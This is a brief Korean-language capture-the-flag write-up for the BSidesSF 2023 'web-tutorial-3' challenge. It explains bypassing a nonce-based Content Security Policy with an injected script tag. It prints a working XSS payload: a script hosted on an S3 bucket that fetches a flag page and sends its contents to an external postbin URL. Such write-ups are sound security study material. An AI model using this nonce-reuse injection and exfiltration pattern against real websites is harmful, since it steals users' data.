[BSidesSF 2023 CTF] web-tutorial-3

1. 개요

XSS, CSP 문제

 

2. 분석

CSP를 보면, script는 nonce가 일치할때 실행가능하고, https로 제공되어야한다고합니다.

코드를 살펴보면, nonce="corgi" 입니다.

 

시나리오는

- 다음 JS 코드를 AWS S3 버킷에 올립니다.

fetch("/xss-three-flag")
    .then(r => r.text())
    .then(t => fetch("https://www.toptal.com/developers/postbin/1682170081878-4064430973958?flag=" + t))

 

- payload로 버킷 url을 제공합니다. (none="corgi") 입력

<script src="https://skyepodium-test.s3.ap-northeast-2.amazonaws.com/payload.js" nonce="corgi"></script>

 

flag를 얻었습니다.